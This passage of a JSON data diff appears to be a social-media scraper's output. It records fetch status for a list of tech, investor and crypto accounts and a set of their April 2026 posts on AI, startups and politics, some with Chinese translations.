"snscrape": 4, + "rsshub": 4 + } + }, + "accounts": [ + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "andrejkarpathy", + "account": "@andrejkarpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 11, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "lmsqueegie", + "account": "@lmsqueegie", + "name": "Lars Nielsen", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "david__tian", + "account": "@david__tian", + "name": "David Tian", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "Bitking_", + "account": "@Bitking_", + "name": "BTCKing", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "Altcoin Buzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "TradingGods", + "account": "@TradingGods", + "name": "Trading Gods", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "Warrior_Trading", + "account": "@Warrior_Trading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "ProfTrading", + "account": "@ProfTrading", + "name": "Profitable Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "直播带逛Tommy", + "account": "@直播带逛Tommy", + "name": "Tommy", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "", + "source": "nitter" + }, + { + "handle": "MikeAI", + "account": "@MikeAI", + "name": "Michael", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "王川", + "account": "@王川", + "name": "王川", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "老胡", + "account": "@老胡", + "name": "老胡", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "比特币超级玩家", + "account": "@比特币超级玩家", + "name": "超级玩家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + } + ], + "tweets": [ + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Faster Than Human Reflexes: A #Robotic Hand Redefining Speed and Precision\nby @sciencegirl\n \n#Robotics #Engineering #ArtificialIntelligence #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048785019083128974#m", + "published_at": "2026-04-27T15:23:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Best accounts for following Austin air quality? @grok", + "url": "https://nitter.net/Jason/status/2048780089295302690#m", + "published_at": "2026-04-27T15:03:32+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: Here’s the bottom line:\n\nAI won’t be won by who moves fastest.\nIt’ll be won by who governs best.\n\nIf your data isn’t structured, contextualized, and controlled, scaling AI will only amplify problems.\n\nI break this down in detail in my latest video with Collibra.\n\nCheck out the full article: https://www.linkedin.com/pulse/ai-scalingbut-governance-determine-who-wins-ronald-van-loon-ypyne\n\nOr Comment or DM “GOVERNANCE” and I’ll share a practical setup tailored to your organization - so you can define the right governance model before you scale.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048779312854118829#m", + "published_at": "2026-04-27T15:00:27+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The real bottleneck isn’t models.\n\nIt’s unstructured data.\n\nI saw a side-by-side demo that made this obvious:\n\n→ Raw data environment\n• lower accuracy\n• higher risk\n• inefficient outputs\n\n→ Metadata-enriched environment\n• better decisions\n• faster results\n• measurable value\n\nSame AI. Completely different outcomes.\n\nThe difference? Governance and structure.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048779308794077361#m", + "published_at": "2026-04-27T15:00:26+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The biggest misconception?\n\nSpeed = progress.\n\nIn reality:\n\n→ Teams are innovating faster than they can govern\n→ Outputs are inconsistent and hard to trust\n→ Risk is increasing quietly in the background\n\nWithout a solid data foundation, AI lacks context.\n\nAnd without context, AI is just… guesswork.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048779304683581558#m", + "published_at": "2026-04-27T15:00:25+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Pinned: Everyone thinks they’re scaling AI.\n\nMost are just scaling chaos.\n\nWhat I’m seeing, including in conversations with @collibra, is a dangerous illusion\n\n→ faster experimentation\n→ more pilots\n→ zero control\n\nThe gap between AI ambition and actual business value is widening.\n\nHere’s what’s really going on…\n\n#CollibraPartner", + "url": "https://nitter.net/Ronald_vanLoon/status/2048779299574911274#m", + "published_at": "2026-04-27T15:00:24+00:00", + "source": "nitter", + "title_zh": "置顶:每个人都自认为在扩展AI。\n但实际多数只在扩大混乱。\n我在与@collibra的交流中观察到的显示,这是一种危险的幻觉:\n→ 加速实验\n→ 更多试点\n→ 完全失控\nAI愿景与实际业务价值的差距在迅速拉大。\n\n这里的是#CollibraPartner。" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Excellent point", + "url": "https://nitter.net/elonmusk/status/2048777628019032335#m", + "published_at": "2026-04-27T14:53:45+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", + "url": "https://nitter.net/GaryMarcus/status/2048771044987777428#m", + "published_at": "2026-04-27T14:27:36+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "#AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul?\nby @measure_plan\n\n#ArtificialIntelligence #MachineLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m", + "published_at": "2026-04-27T14:23:11+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://nitter.net/HarryStebbings/status/2048764741435179442#m", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://nitter.net/HarryStebbings/status/2048764743205134644#m", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "How poor #Data foundations can undermine #AI success\nby Joanne Carew @CIOonline\n\nLearn more: https://bit.ly/4cGbKSG\n\n#MachineLearning #ArtificialIntelligence #DeepLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m", + "published_at": "2026-04-27T13:45:07+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://nitter.net/JeffDean/status/2048759102390899142#m", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "published_at": "2026-04-27T13:32:43+00:00", + "source": "nitter", + "title_zh": "⚠️ AI代理是一种发展极不成熟的技术,却正在以过于快速的节奏被推出应用。关于当前广为流传的情绪编码AI代理灾难事件,最深层的教训并非仅仅是数据损失。 ⚠️\n\n真正的核心问题是AI的安全性。 \n\n这位用户并不是(完全)是无知的,他认为系统提示和防护措施能保护自己。但是它们没能做到。 \n\n在这个案例中他失去了数据。而最终人们会失去生命。" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m", + "published_at": "2026-04-27T13:30:16+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "published_at": "2026-04-27T13:24:26+00:00", + "source": "nitter", + "title_zh": "我们已升级与微软的合作关系。微软将继续作为我们的主要云合作伙伴,但我们现在能够将其产品和服务扩展到所有云平台。我们将继续向他们提供模型和产品直至2032年,并在2030年前进行收入分成。" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials\nvia @IlirAliu_\n \n#Robotics #ArtificialIntelligence #ML #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m", + "published_at": "2026-04-27T13:11:07+00:00", + "source": "nitter", + "title_zh": "双臂履带式人形机器人迈出实际工业应用的第一步,经由 @IlirAliu_ \n#机器人技术 #人工智能 #机器学习 #创新 #科技" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://nitter.net/sama/status/2048751392031203544#m", + "published_at": "2026-04-27T13:09:30+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My view is simple:\n\nThe winners in enterprise AI will not be the companies with access to the most models.\n\nThey will be the ones that build the best intelligent systems around them.\n\nIf you want the full breakdown, watch the video and tell me what part of your AI stack you are rethinking first.\n\nWhat do you think becomes the real source of advantage in the next 12 months, the model itself, or the orchestration layer around it?\n\nCheck out the full article: https://www.linkedin.com/pulse/agentic-ai-reshaping-enterprise-strategy-faster-than-you-van-loon-9rfme", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m", + "published_at": "2026-04-27T13:00:20+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The second misconception I keep seeing:\n\nToo many teams think they have to choose between open models and proprietary models.\n\nThey do not.\n\nThe smarter path is hybrid.\n\n→ proprietary models for scale and broad capability\n→ open models for flexibility and control\n→ orchestration layers to route each task to the best-fit model in real time\n\nThat is how you balance performance, cost, and governance without locking yourself into one lane.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m", + "published_at": "2026-04-27T13:00:20+00:00", + "source": "nitter", + "title_zh": "向@Ronald_vanLoon回复的第二点误区:\n\n太多团队认为他们必须在开源模型和专有模型之间做出选择。\n\n其实不需要。\n\n更聪明的路径是采用开源与专有相结合的混合模式。\n\n→ 用专有模型实现扩展性和通用能力\n→ 用开源模型实现灵活性和控制力\n→ 通过层次化编排将每个任务实时路由到最合适的模型\n\n这样你就能在不把自己局限于单一技术路径的情况下,平衡性能、成本和治理体系。" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My biggest takeaway:\n\nModels are becoming components, not products.\n\nWhat matters now is the system around them:\n\n→ runtimes\n→ memory\n→ tool access\n→ orchestration\n→ secure execution environments\n\nThat is what turns a model into an agent, and an agent into something the business can actually deploy across functions.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m", + "published_at": "2026-04-27T13:00:19+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Most enterprise AI strategies are already behind.\n\nNot because they picked the wrong model, but because they are still thinking at the model layer.\n\nThe real shift is happening one level up, where AI becomes a system that can reason, use tools, retain context, and execute work inside secure environments.\n\nThat changes enterprise strategy faster than most leaders realize.\n\nA thread, with insights from my latest video with NVIDIA…\n\n#NVIDIAPartner #NVIDIAGTC", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m", + "published_at": "2026-04-27T13:00:18+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain\nby @spaceandtech_\n\n#Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m", + "published_at": "2026-04-27T12:50:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m", + "published_at": "2026-04-27T12:48:41+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "published_at": "2026-04-27T12:36:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m", + "published_at": "2026-04-27T12:20:17+00:00", + "source": "nitter", + "title_zh": "Reddit上的氛围灾难事件不断累积" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being\nvia @XRoboHub\n\n#Robots #ArtificialIntelligence #Innovation #Technology #Tech", + "url": "https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m", + "published_at": "2026-04-27T12:18:17+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", + "url": "https://nitter.net/KatieMiller/status/2048727747954868342#m", + "published_at": "2026-04-27T11:35:33+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence\nby @CyberRobooo\n \n#Robot #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m", + "published_at": "2026-04-27T11:20:17+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted to remove him from state ballots. \n\nWhen all of that failed they tried to assassinate him not once but four times. \n\nAnd they go on national television to talk about how we need to vote for them to save democracy.", + "url": "https://nitter.net/jason_meister/status/2048720909809156378#m", + "published_at": "2026-04-27T11:08:22+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://nitter.net/paulg/status/2048704073356935676#m", + "published_at": "2026-04-27T10:01:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://nitter.net/paulg/status/2048701354672050286#m", + "published_at": "2026-04-27T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227#m", + "published_at": "2026-04-27T08:17:48+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://nitter.net/jasonfreedman/status/2048615296613937201#m", + "published_at": "2026-04-27T04:08:42+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "published_at": "2026-04-27T03:39:49+00:00", + "source": "nitter", + "title_zh": "@GaryMarcus转发:把自动补全称作\"AI\"是本十年最大的骗局。第二大骗局是把循环中的自动补全称作\"智能体\"。" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://nitter.net/elonmusk/status/2048600964102246438#m", + "published_at": "2026-04-27T03:11:45+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m", + "published_at": "2026-04-27T02:41:14+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": 